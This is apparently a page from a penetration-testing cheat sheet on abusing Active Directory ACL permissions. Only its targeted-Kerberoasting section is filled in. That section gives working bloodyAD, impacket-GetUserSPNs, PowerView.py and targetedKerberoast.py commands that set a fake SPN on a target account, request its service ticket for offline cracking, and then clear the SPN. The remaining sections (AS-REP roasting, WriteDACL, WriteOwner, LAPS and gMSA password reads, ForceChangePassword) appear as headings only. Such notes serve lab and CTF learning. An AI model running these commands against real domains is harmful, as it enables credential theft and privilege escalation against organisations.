🛠️Abusing ACLs/ACEs
GenericAll/GenericWrite
User/Computer
Linux
# Assign a fake SPN (cifs/gzzcoo) to the account called 'target'.
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set object 'target' servicePrincipalName -v 'cifs/gzzcoo'
# Get the TGS ticket of the user we made Kerberoastable.
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.htb/'user':'password' -request-user 'target'
# Leave the SPN empty on the user we had made Kerberoastable.
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set object 'target' servicePrincipalName# Through PowerView.py
powerview domain.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10
PV > Set-DomainObject -Identity "TARGET" -Set 'servicePrincipalname=cifs/gzzcoo'
# Automatic process, assigns an SPN to users with permissions, gives you the TGS ticket and then leaves the user as it was.
python3 targetedKerberoast.py --dc-ip 10.10.10.10 -d domain.htb -u 'user' -p 'password'Windows
AS-REP Roast Attack
Linux
Windows
Password Modification
Linux
Windows
Script Path Manipulation
Linux
Windows
AddSelf
Method 1 (LDIF File)
Linux
Method 2 (bloodyAD)
Linux
Method 3 (PowerView.py)
Linux
Group Manipulation
Linux
Windows
WriteDACL
WriteDACL on Domain
Linux
Windows
WriteDACL on Group
Linux
Windows
WriteOwner
Method 1 (bloodyAD)
Linux
Method 2 (impacket-owneredit + impacket-dacledit)
Linux
Method 3 (PowerView.py)
Linux
Windows
ReadLAPSPassword
Linux
Windows
ReadGMSAPassword
Linux
ForceChangePassword
Method 1 (bloodyAD)
Linux
Method 2 (rpcclient)
Linux
Method 3 (net rpc)
Linux
Method 4 (pth-net)
Linux
Method 5 (PowerView.py)
Linux
Windows
Organizational Units ACL
Non-Privileged Objects
Linux
Last updated